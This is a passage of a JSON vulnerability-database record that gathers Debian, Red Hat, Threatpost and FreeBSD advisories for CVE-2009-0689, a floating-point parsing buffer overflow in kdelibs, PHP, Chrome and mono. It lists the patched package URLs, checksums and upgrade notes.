http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 46898502 68ab0f7e5a5056f125405d915b300008\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 1449660 36f93450d57a36d9a8d4d1d2db9d43ca\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 11082858 07111fb035bfe0eda0b2441b1bba80f8\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_amd64.deb\n Size/MD5 checksum: 27426528 08898808eb9eed7b871aa571d2f9a237\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 9641676 8b316ebf3bfdd478029185a7e6d47f49\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 1442674 3b01d0efad56cd690c9cdb3e00ecee4a\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_arm.deb\n Size/MD5 checksum: 47034292 ce8b22299bdfbb94c9b66ad3d21d4f6f\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 1433914 9a3ae9c8a3139fbd27764e9af28d2737\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 9563740 29b380d8ab706310db8912f5f67137b3\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_armel.deb\n Size/MD5 checksum: 46539978 b24b2a5df34e29c70e5d2a280b466609\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 11577906 010821c103e2172acd60ac9454e07975\n 
http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 1448464 af5119ddb9de50bb95ae2ab6760399f9\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_hppa.deb\n Size/MD5 checksum: 27838586 00cfe209f75d904751d8fec86f1ca4d3\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 10395042 52ecd0a337e5732836367ab53d97f88f\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 26698244 909b074ce6bcaefe3d401126d2615f8d\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_i386.deb\n Size/MD5 checksum: 1440406 c556151bb5a316eb9ab31c3935b41f3b\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 27256656 fa2b74b8ebf132cc51f03a3a67f88b94\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 1447294 359e619f9c448ea152da8ec75171ec56\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_ia64.deb\n Size/MD5 checksum: 14729196 b68fd5722d194f338f2c198a5a8ad3f3\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 1395642 4355fac1721fff347677de60f2d0c6b0\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 28275256 333044fb5317d479f48d52e6168000d9\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_mips.deb\n Size/MD5 checksum: 9435400 02ec40a4e98c07881e383b746d7b288b\n\nmipsel architecture (MIPS (Little Endian))\n\n 
http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 9302160 8258f05da522076b668b6e7f269dbacd\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 27203156 6a4dd375e27a80dde7f39c0f2060f1ff\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_mipsel.deb\n Size/MD5 checksum: 1395886 65428046928c7f67b9ef5239ef60b9d4\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 28204250 f6ac77dac3bde9ca597da9145b33713b\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 1458744 9603268bf627bbacd0e7a12c3a94802f\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_powerpc.deb\n Size/MD5 checksum: 10958986 a498e9f65725b5f735a9d56dca1e0829\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 11137838 f676f7a433624b3cb47cfc8e3441644c\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 1399242 db48b7910f27162734b8bad742e9b8cb\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_s390.deb\n Size/MD5 checksum: 27719212 c1070ae61e00d808e636c183639f3ff8\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 9967244 0990757031afe40d7a01e8794a37dc94\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 1438956 42fe0dbcd6228aee3b4643836c3ff4f7\n 
http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-0lenny4_sparc.deb\n Size/MD5 checksum: 25484970 83d65503f4397d63079bdaa28660a43b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2010-02-17T18:25:38", "published": "2010-02-17T18:25:38", "id": "DEBIAN:DSA-1998-1:6C47A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00038.html", "title": "[SECURITY] [DSA 1998-1] New kdelibs packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:35", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "The kdelibs packages provide libraries for the K Desktop Environment (KDE).\n\nA buffer overflow flaw was found in the kdelibs string to floating point\nconversion routines. A web page containing malicious JavaScript could crash\nKonqueror or, potentially, execute arbitrary code with the privileges of the\nuser running Konqueror. (CVE-2009-0689)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The desktop must be restarted (log out, then\nlog back in) for this update to take effect.", "modified": "2017-09-08T12:09:35", "published": "2009-11-24T05:00:00", "id": "RHSA-2009:1601", "href": "https://access.redhat.com/errata/RHSA-2009:1601", "type": "redhat", "title": "(RHSA-2009:1601) Critical: kdelibs security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA buffer overflow flaw was found in the way PHP parsed floating point\nnumbers from their text representation. If a PHP application converted\nuntrusted input strings to numbers, an attacker able to provide such input\ncould cause the application to crash or, possibly, execute arbitrary code\nwith the privileges of the application. (CVE-2009-0689)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "modified": "2017-09-08T11:51:25", "published": "2014-03-18T04:00:00", "id": "RHSA-2014:0312", "href": "https://access.redhat.com/errata/RHSA-2014:0312", "type": "redhat", "title": "(RHSA-2014:0312) Critical: php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:31", "bulletinFamily": "info", "cvelist": ["CVE-2009-0689"], "description": "Google has pushed out a new version of its Chrome browser to fix a high-severity security hole that could lead to malicious code execution attacks.[](<https://threatpost.com/high-risk-flaw-fixed-google-chrome-100609/>)\n\nThe vulnerability could be exploited to run arbitrary code within the Google Chrome sandbox, the company said in an advisory.\n\nThe [raw details](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689>):\n\n * The v8 engine uses a common dtoa() implementation to parse strings into floating point numbers. We have applied a patch to fix a recent bug in this component.\n * Severity: High. 
An attacker might be able to run arbitrary code within the Google Chrome sandbox.\n", "modified": "2013-04-17T16:39:51", "published": "2009-10-06T22:32:02", "id": "THREATPOST:DF62052EA2F1372006ACE34D8541F7DB", "href": "https://threatpost.com/high-risk-flaw-fixed-google-chrome-100609/72204/", "type": "threatpost", "title": "'High Risk' Flaw Fixed in Google Chrome", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "\nNCC Group reports:\n\nAn attacker who can cause a carefully-chosen string to be\n\t converted to a floating-point number can cause a crash and potentially\n\t induce arbitrary code execution.\n\n", "edition": 4, "modified": "2015-12-19T00:00:00", "published": "2015-12-19T00:00:00", "id": "4B3A7E70-AFCE-11E5-B864-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/4b3a7e70-afce-11e5-b864-14dae9d210b8.html", "title": "mono -- DoS and code execution", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}